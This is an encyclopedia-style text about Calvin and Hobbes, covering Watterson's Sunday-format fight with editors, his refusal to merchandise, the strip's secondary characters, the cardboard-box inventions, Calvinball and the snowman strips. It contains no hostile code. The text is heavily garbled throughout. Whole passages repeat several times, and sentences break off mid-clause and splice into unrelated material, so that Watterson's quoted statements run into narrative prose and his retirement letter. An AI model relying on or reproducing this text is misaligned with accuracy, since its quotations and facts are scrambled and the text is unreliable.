Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectors antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes at the end of the year This was not a recent or an easy decision, and I leave with some sadness My interests have shifted however, and I believe I've done what I can do within the constraints of daily deadlines and small panels I am eager to work at a more thoughtful pace, with fewer artistic compromises I have not yet decided on future projects, but my relationship with Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes reruns were made available to newspapers from Sunday, September 4, 2005, through Saturday, December 31, 2005,

Early books were printed in smaller format in black and white; these were later reproduced in twos in color in the "Treasuries" Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

